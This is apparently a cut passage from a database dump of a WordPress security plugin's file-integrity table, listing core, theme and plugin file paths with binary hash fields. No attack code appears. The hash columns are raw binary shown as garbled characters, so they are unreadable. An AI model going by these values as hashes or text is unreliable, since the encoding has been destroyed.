ш','',0,'?'),('��]�/�И+��מRd','wp-content/themes/university-hub/js/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1��=3r2�����','�@����\r���{�|�S�x\\k\\�*}U�1�','',0,'?'),('��\'g!�:�H��),�','wp-includes/SimplePie/XML/Declaration/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O,@�ۺ�a�	Δ��','��im�Q�q+��\r��:�Po����\Z*�����','',0,'?'),('���\"�����c)j�\"','wp-includes/js/wplink.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`��̶�Vu��m��','Ե*&n�����_��f\nz\r*���3I�I;C›�','',0,'?'),('� �E~mQ��P4ދ','wp-content/themes/newsmag/assets/sass/site/secondary/_widget-banner.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{���/�:MYp���w#�','�n�\\6�ugy@7�L�������%����','',0,'?'),('�\"�&��}�-:�2��','wp-content/themes/singularity/taxonomy-download_category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@	��qv�3�,���','���\"�K�0p`�[oKE�߳��������','',0,'?'),('�/��i�Zج �[?�*�','wp-content/plugins/wp-cerber/assets/multi/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u���E.0�Ȁ��b[�','�]=2�����F���(Cҷ\Zc�93Є�K@','',0,'?'),('�=@\\�JpQ�m\\��6','wp-admin/includes/class-wp-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M$=�8�:����Az�n','%L���ð�@C�Ub��t�����n���c\Z�d','',0,'?'),('�L#�����a���W �','wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���DBSq&a��_�%','�2��C���Zh+�̴���\'�H��p�H�r','',0,'?'),('�R��UVP��5�,%��','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/runmode/colorize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=T�k$n���nu','␣���W�	f�a�������\\�j���','',0,'?'),('�bz�/���T�7aHy','wp-includes/js/mediaelement/mejs-controls.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^yq+�S%��y','������h���A3L�:��\'1�ꁠ�\\�','',0,'?'),('�c��u�$��Q�;W�l�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/runmode/colorize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=T�k$n���nu','␣���W�	f�a�������\\�j���','',0,'?'),('�q����%ű� m+','wp-admin/css/colors/light/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\07Α�L��b�HgO�','5���m���%!��au�l�qRk{qn�ia�0','',0,'?'),('�r�±�2�\"}�	�,�7','wp-content/plugins/wp-cerber/assets/flags/nl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��+Z59����)|','/��\ns��!�-���?k���>��yU� �','',0,'?'),('ߌ��(������2���','wp-includes/js/quicktags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�w.PX�Mɇs�K!','_1��T��)��U�k�`{��,�;�k��o�','',0,'?'),('ߔ������H�u�&�','wp-includes/js/plupload/plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݠ�$pZR�>\'�|�','�\"����8[J%�.�˚�c�V\r\rE��)\'','',0,'?'),('ߗ�Q��u�!ٶx�[','wp-includes/js/wpdialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=nR�-��KP��=��<','w���ڇEÞ����\0�v�ӭ��k^�M�n','',0,'?'),('ߛ�J/j�<�%�<[�','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/keymap/emacs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_\'„Nn�쫅2s��','ʋ��w��A�3j6�L\Zp�3̞� U�pJ','',0,'?'),('ߟ�����}{H����','wp-content/themes/newsmag/assets/sass/variables-site/_typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\��o�?�YCƑ�}','�6�ǠH�A�\Z��]�*\\�@g���-B?�','',0,'?'),('߯�l�凿ػ>6��','wp-content/themes/graphene/js/jquery-ui/dev/jquery.ui.slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5T��\nV�⾊��\\�','uѵY�7\'�����n�~�����D���]G`�','',0,'?'),('߰S����h[�۳�','wp-includes/class-wp-http-streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oo�֪$N�~�F0�ۂ','��d�	*ȩ�X���J�z9<��)�>�ԃtj','',0,'?'),('ߴ�S8��AТ','wp-includes/js/jquery/ui/autocomplete.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':dL�*�E�&*!','��`��Or\r�8;P[Q�=�;����ܣj','',0,'?'),('ߴ:�������wh','wp-content/themes/Endolf/content-page.php',0,'����,�,�y/e����','����,�,�y/e����','��?Z� �`!o_�I��ieC���/l�','',0,'?'),('߹V�=���\"�#n�	�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�-�T�\0�2�L-�','�ȴ����g�A�]�z-ۣ��᷸[�','',0,'?'),('߾��x�#�@���yt:','wp-content/themes/graphene/images/social/tumblr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��3��{[���y]J�','��,�����Ĝ�)��D���/�S�l��','',0,'?'),('����E������l{','wp-content/themes/simpleshift/assets/js/scrollReveal.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v=�J�>a�3�)0','�L�ý�X�A�j��\0�Y6�C�ϛX��\r�\r:�','',0,'?'),('�ĵ>��#B��b���','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۓ���G�c,��=c^�','�����G�c����t(5\n,9%�����)�e','',0,'?'),('�Ȧ0� $�7O>���','wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�Ǻ\Z��.��զ','ڟXZfd�ޱEd4�z%��×\0cKc�J�l^','',0,'?'),('��G]��9���e7��(','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���7[�x�蛴','8�I��ԉo�)\'z�R�^�-M1\'�\0����','',0,'?'),('��Yv�z�֗*�9��a','wp-includes/js/jquery/ui/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�<Q�1}�������','�M@�jM�m��\\����`T@�.���Rl.��','',0,'?'),('�֤W�c����o��*6','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-radio-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���a�u\r�\"�','��E΅Th3� g���]-yX�|/�Rc|��=�','',0,'?'),('��m�Y���u��#�D3','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-typography.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)�B�oDj�.R��','�19�%*s�O}#b�l��?���05C��Nl�','',0,'?'),('���$���� ��ԧ','wp-content/themes/singularity/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�n�E���?��WU��','��jU��)���?�(>��:B\\>��$N��]','',0,'?'),('���7�j�\rCʿtR2o','wp-content/themes/enigma/js/scroll.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۢoi�IR4`x�','��\0�,=u>��%\'��Ib��1���.mc','',0,'?'),('��$dp���C����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z\'�ZP��ie����','6m�<g��\0{tX��)��U�4�N�4M�3','',0,'?'),('�������ä���=-�','wp-content/themes/advance/inc/kirki/assets/js/controls/custom.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('��=GV�cBr�r�=','wp-content/themes/wp-simple/assets/images/preview/262x262-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~?$�rI��QQ&�5�','�u��_7�2���v�2%\r.F���G�Т���','',0,'?'),('��eş+�\r��	���','wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~/���+(7�D��',')�vIy��a��\"?����@v�pYAqJ���>�','',0,'?'),('��|?潀��ѠM�A�e','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/lint/lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E���CLb_Y�NE','���ӟ5�}�i��L���R���$�.�h2�B�','',0,'?'),('�a�nR*���H̃]','wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�T?��^�w���','O@x�|\"�*�N=^��E<y-�<͇���','',0,'?'),('�|0oC�|U_p��','wp-content/themes/gambit/template-parts/post-slider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ٟ�[���������ƭ','hr�0�3�4}5��$6�H^�\'�\0�� �Y�i%','',0,'?'),('��&��=N��u�#y','wp-content/plugins/wp-cerber/assets/flags/bw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�]G��G�9�P','#�O�mT>O���://c/Pu�$0�����','',0,'?'),('�%�f\\+,���\0\\Y','wp-admin/includes/class-wp-filesystem-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O��r�݇o��','�Yb�eA\'�#�đÎؚ��[9��=-&S�TT�','',0,'?'),('�*����\'Kj��̰!c','wp-content/plugins/wordfence/waf/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P!�7G�NJ�q`.','.��\n)[.��c�f��\r�\rF��Z�k����','',0,'?'),('�8�)��#�uJ�N{P��','wp-content/themes/weblog/assets/library/SlickNav/jquery.slicknav.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ꖋі�r�ײ��D','�����#��v�o$�Eq#8�5���YƂ','',0,'?'),('�?7�`��9���Å','wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"��If�D�S~�Ee;\"','-�L\\Z�%���Er_^nniW�B-�mC���5A','',0,'?'),('�B�N��3i���C','wp-content/themes/authorize/assets/stylesheets/font-awesome/less/core.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N�J�77phu��Ƿ�',',��w���!s��0�Hr{�DߎQ���1F)�','',0,'?'),('�K�h��i���/��O@','wp-content/themes/catch-flames/images/slider.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�~��^|�6����','j����\\y-#�&�d5���\\O����48���','',0,'?'),('�[r�W����3^��1�','wp-content/themes/graphene/images/social/friendfeed.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�)|\\�\'a\r�ҥ��|','	n�Y�%<��:��M�+T���J�aV�u','',0,'?'),('�\\1݃�%�VE|<N��','wp-content/plugins/wordfence/modules/login-security/img/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('�i���4��Zl�Ѓ @','wp-includes/css/dist/block-editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W.�M�л�=@�D�Yw#','�1.�f���\"|�R�;x�7B�6����3a���','',0,'?'),('��r��M�ܴ-\nS��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eR��r�#�U���犏','���s�Gd��l�IB-?`7|r�R��3����V','',0,'?'),('�X9ۍ����v�TU�','wp-content/themes/education-hub/js/custom.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�A�y5�����_','WBD�B9�y�2�恑cìka����:�+���','',0,'?'),('࿨��\0�1���t	�	','wp-content/themes/wp-simple/assets/images/preview/750x500-6.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��n�![�4E�g�','� i���\Z�f�q���$oZ\'�A��FD��>Д','',0,'?'),('��\Z�$]�W��wP�l','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�We�U{�9�','������G����8�=�\0�> �3�wg3.�4','',0,'?'),('��^��bR��SI�!�?','wp-includes/class-wp-image-editor-imagick.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��--��	�2��6','\0\\��0*���%Qݯ�O��^��8��G�z','',0,'?'),('��7�u\0fj����T�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/ttcn.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�{�<TI��>h�y','#�tG! �P�W*$�r������Q��vj�:','',0,'?'),('�VDc|!��6��#�','wp-content/themes/Endolf/functions.php',0,' ���nj|f�?�y�N�y',' ���nj|f�?�y�N�y',']����}���0�gSn���V���\r[娈.f','',0,'?'),('����sk�6/��н�','wp-content/plugins/wordfence/lib/wfSupportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!eZu\0z�[�O��O��<','�Q:4s-¦�\n��y���}�x�z���5�','',0,'?'),('�t[�&M�\09�VN','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/radio-image.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\nDZ�]&��m��\n[{','�d�Oӛ�MCJ��п��3�\\5��)�\Z','',0,'?'),('�1����\n�#6G?r�','wp-content/themes/hitmag/inc/kirki/includes/class-kirki-l10n.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%���ª㚕�ψ]��','�?�[!��P��D���ꎶ\n>�\0���','',0,'?'),('�5W=�C�>��i��','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ވ����RxBB��dK','N�\r��v���r����\r7C�H��G+���','',0,'?'),('�86fod�/J��v�','wp-content/themes/advance/inc/kirki/includes/output/property/class-kirki-output-property.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_[M\"]���00�ö�P','U���jA	��\n�a�cD��_�Q\"-��.�	�','',0,'?'),('�@��M]\"���iNJ','wp-includes/class-wp-http-requests-hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,ͣa4h��D�U�+','�5���կzV��Rt�I/�+˘H0N����\'C','',0,'?'),('�OR���7�SǶ\n','wp-content/themes/graphene/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�iY=���b*靣','�-�Wzꁐ���z��8� E�2��r\'|��\'�','',0,'?'),('�O��_��?�B��','wp-content/themes/graphene/images/social/dribbble.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k����<�\Z�\n2�io','��W�q���~-��z^W�I(W_��1�)y��','',0,'?'),('�Rs�2�չ���=','wp-content/plugins/wp-cerber/admin/cerber-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�pz$]��?﫶gj�','��������<��^�M�v��5�Ò����j','',0,'?'),('�Z���(>(�1bޫ�Z�','wp-includes/js/tinymce/skins/lightgray/content.inline.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lo7�r79wA�U�E','���E���P���[���x�v1i0�h;����^J','',0,'?'),('�\\�����$�I�H��','wp-includes/js/jquery/jquery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3i��7�L�1�<','�s��)=\'�5r����l�}�<�(v\'ܘl�x\Z','',0,'?'),('�b��VE��7f��	','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�NI\0�/i���~��','�����\\&��r-������J������͠#','',0,'?'),('�e����:֬p6�','wp-includes/js/dist/vendor/wp-polyfill.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7E�~?V�֬��o�B','b1�r�������J�w���./2�M��`','',0,'?'),('�i�u0\r�}o6o�	P','wp-content/themes/metro-magazine/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sHwz�Vb�����{?','�ѫ\0M������p�վ��\'Ԑ�-�Uc','',0,'?'),('�p�|��\nd�	x/`=�','wp-content/themes/event/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K�%dT�)0 \"`�',']@1_,I�R]�*3l��	��pFۅ�wN��Ύ\"','',0,'?'),('�q�@/��ꦑٞ-M�','wp-admin/network/site-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?:Ĉ�-�żѐ\\x)p','�2�-�X����)��\rP�����bV�ҝb)sV','',0,'?'),('�~\r��ð�D��D��?�','wp-content/themes/catch-responsive/css/jquery.sidr.dark.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@�gkB,}���\'�','#�Oo�ĵ���?a�J	��sl(͝�HH,','',0,'?'),('�~SW���Kr��=��','wp-content/themes/the-best/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F��s��ll]�)��','�7v7E?o��0�zě�۶b+�d��?��','',0,'?'),('�<;9\n���}8]�','wp-content/themes/graduate/tp-education/tp-archive-testimonial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�Za�욆��','D�o.�`ʲG��r��{�x4�����	��','',0,'?'),('ᕵ7\\F�|�[E����l','wp-includes/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0���s0C{[��[t7','Z�z`�}���J�GN]����l��Q��8��H','',0,'?'),('�>“���\n�5����Z','wp-includes/customize/class-wp-customize-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�f��	˥�^�К','�\nu��8�\rYY��:\nVk���.aG��GoM','',0,'?'),('�5��6觙|y��`','wp-content/plugins/all-in-one-wp-security-and-firewall/images/arrow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G\r�6\n���4����','��!�-{��Fe�W(��=\'y�j��tm�8�','',0,'?'),('�;�Dth�E�G�>�H�','wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����o�����\\�','��Zm�$z��p�uC��VgIgI���N�','',0,'?'),('�?-p,����ҩg','wp-content/themes/wp-simple/inc/kirki/kirki/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�sZ���C�jW��0','�~��wi�~�`�t��F�3��7�&��#�4�\'t','',0,'?'),('�E]Q=5���x�<��2','wp-content/themes/auberge/assets/js/scripts-navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-i2�\n��U�|','3�%�yϔ���tɔe�+/�w�ֻ>`�z^��4l','',0,'?'),('���m|�yb����','wp-includes/class-wp-recovery-mode-email-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ��Gu�n���Et','Y�ѾLP����=NL������*Π�T9�I�(','',0,'?'),('��G�����	Z�9m�','wp-content/themes/city-store/assets/sticky/sticky-settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/�W!�1��%Փ���','IV���b�y���R�F�{&�����ϊ9>Ϩ?\0-','',0,'?'),('��l`o�ݢ�	�8�\Z','wp-content/themes/weblog/acmethemes/customizer/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:4l�ޕE�U�','�� VQn2�_���-y�h��&m�f�O�;+','',0,'?'),('���෫�����','wp-content/themes/enigma/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0Z��Ʈkv���Y���','	����6j]a,�/a]��N��02r�_�Ry','',0,'?'),('�����Q#k��\n1��','wp-content/themes/Endolf/index.php',0,'ٕb�Eqܥ|C�V','ٕb�Eqܥ|C�V','@c�v�V�v\r�.�7��E�BQew��+(��','',0,'?'),('��5t u\Z�0���v�','wp-content/themes/brickyard/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�f�N�b\0�+n�*#','�2�P��=�\\��;D���V1�7�J','',0,'?'),('��J����eG(�4�N','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/search/search.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','px\\��Q�ۿN���w','%��%�hۦ�LuYt�TS�\'[�/X�~>X�t�','',0,'?'),('���r�f4�f?r��','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/edit/closebrackets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�N��x�\n3Z9Z�',')�5y�u���{=�.�qJ\\u�Z��/!I���@','',0,'?'),('��\\9ã>���Iz4�c','wp-includes/js/tinymce/plugins/hr/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k+%�5l3�!-��','�2`���Ri�L��#e؄�4�6�g�p�o~�','',0,'?'),('����Նb���û-\\','wp-content/themes/wp-simple/inc/kirki/includes/class-kirki-scripts-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�w_�_D��C��c�m\\','+��W�<J�&�Fy�MRő���e���X','',0,'?'),('�8�\n�����o��','wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�И�]e��Ğ�c%�I�','�\\H�XE�[����h�������YT��Uƥ','',0,'?'),('�BK���A�a<�l2','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xߓ�Œ\"X3�6DQ�','!�l.�.��GI�\n7oe�ѿ�\';I�\n\n���','',0,'?'),('�R�\Z��ѧdr_@��','wp-content/themes/newsmag/inc/widgets/posts_list_vertical/class-widget-newsmag-posts_list_vertical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x�E��VGUy<ͼQ','i*�^8k�,40n3q��)@��	�mA@�u(��','',0,'?'),('�(��0;����^��','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y�(F�T<Q~�','\\�QA�:KJ��,p�Ǿf���ʗ�9gH�9@]','',0,'?'),('�0��/�]��`�','wp-content/themes/wp-simple/assets/images/preview/750x500-3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>Dz#8\\�:l9��!�','k�<�ʸW�mtLi=�=���~�\\\'Oj~�','',0,'?'),('�8��s=m�����{�','wp-content/themes/education-hub/js/skip-link-focus-fix.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ޢш}:&\n�y^���C','�3��]����/!h���o*����\\�@f�','',0,'?'),('�8Իi�炙OG^X','wp-content/themes/event/inc/widgets/widgets-functions/register-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&+��I[wY3OOy3��','Fb�(�\Z��C\n<<�Vs�~H7Ύ�N��U���e','',0,'?'),('�9؝)�F���','wp-content/themes/graphene/images/social/typepad.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&]I��P�&�V��','R����0�@�$�Jb1g�3���|�,gx','',0,'?'),('�L�>�ٟ�#{6p}Y��','wp-admin/options-writing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ì�,{J�>M*\ZY��3','�������C�I�T��H&3��8�̞n�','',0,'?'),('�U6υs�d�~x���','wp-includes/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�*�un�rdu�g���','�ҷ<h�bo�>�W��\Z�N��� e��ia�','',0,'?'),('�[b�\0}$�6���','wp-content/themes/singularity/template-parts/content-page-narrow-column.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UE�\'�rƮٍg��u','�%g(���{?e��;L����hz����y�a','',0,'?'),('�^}R	�V7{WI\rH','wp-includes/blocks/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','էL\n�8���{s���','x�\Z�R�>ؼ�:�@3�W@f�e�f����L�','',0,'?'),('�hXi��O�.5����','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-radio-image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���a�u\r�\"�','��E΅Th3� g���]-yX�|/�Rc|��=�','',0,'?'),('�o��[Y��]Q��p�','wp-content/themes/Yegor/js/flexslider.js',0,'K���:\"W#R��b�','K���:\"W#R��b�','Ñv\nq�o�\r�1�l��!�4d[�%o�x���','',0,'?'),('�r�R~#��~`��\ng','wp-content/themes/wp-simple/parts/wp_link_pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�4D=C��=��]�X܅','��z��m\"��9`��̃,����/=�\n���','',0,'?'),('�y�0H�#;�e\n\"�+','wp-includes/js/dist/server-side-render.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�eQǔ;-P7�苛�d','rP���^�ç\Zx~�;�����\"�x]43s','',0,'?'),('�{K~�ղ���Ų��ۨ','wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k&���}�;1','�.v;�q��]�m�,�\\ؔ���Zr�.�\n{','',0,'?'),('�{ylb{�4��\n�\r','wp-content/themes/wp-simple/inc/kirki/assets/css/customizer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���y����ޕ�M','��[<9C���Gx�n92�^]�<�a�x�4��\Z�','',0,'?'),('��:�6d�e\'O','wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӟ=:&��$.���W`vI','�u����y�Һ\0v�&�%�0)^�\ZA�6�','',0,'?'),('� �[4��Z<��T�','wp-content/themes/exoplanet/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l�[ո�(3��','���Eb�Z�/J�:.���11D\\\\U�fl�\n�N','',0,'?'),('���>&�Is-��;�','wp-content/themes/graduate/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Š$�$�ĴIP����','���ֺ�׌��yb\\~��\Zk\nϰ6�ϴy\"�','',0,'?'),('��Za9�U�z��ն','wp-includes/class-wp-date-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�U��	�L]-�Rs�@�','ֲP4]���!	o3\n��l���Q�0�','',0,'?'),('��a�`?a�Ҡ��T','wp-content/themes/brickyard/docs/assets/blueprint-css/plugins/link-icons/icons/doc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?��*��z5���','���#ߟꕼ���402���v�:��n{/�\0','',0,'?'),('��̚Z��%�,sJ[','wp-content/themes/wp-simple/inc/kirki/kirki/includes/class-kirki-selective-refresh.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7&Z-�榞٩���\n}','�\ZJ�l�( j�gix����u�߳Z','',0,'?'),('�Ϣ��x\'�}��#p\0��','wp-content/themes/the-best/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A`�r��\'zYr�','Uy��C����D�+Ћ�n�)kr�7����','',0,'?'),('��ĸ:�,p�1��Hr','wp-admin/js/dashboard.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��)�{)�%�','�{G���\n�<Q�IO�	���%�k���%','',0,'?'),('���\0��!^D���','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/edit/continuelist.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-Y1���[=+��h','��7{��Z��HV�1j8�����^�b����','',0,'?'),('���~�*Tݐ���','wp-content/themes/newsmag/inc/components/breadcrumbs/class-newsmag-breadcrumbs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dn�j�H/>_�LAj��','�(�TU�;q+�_\0f�E1d�\\���r�&�\n','',0,'?'),('��̂Hd�ӕ�.�','wp-content/themes/catch-responsive/js/html5.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�&�w�<��\0	h�-8`','�t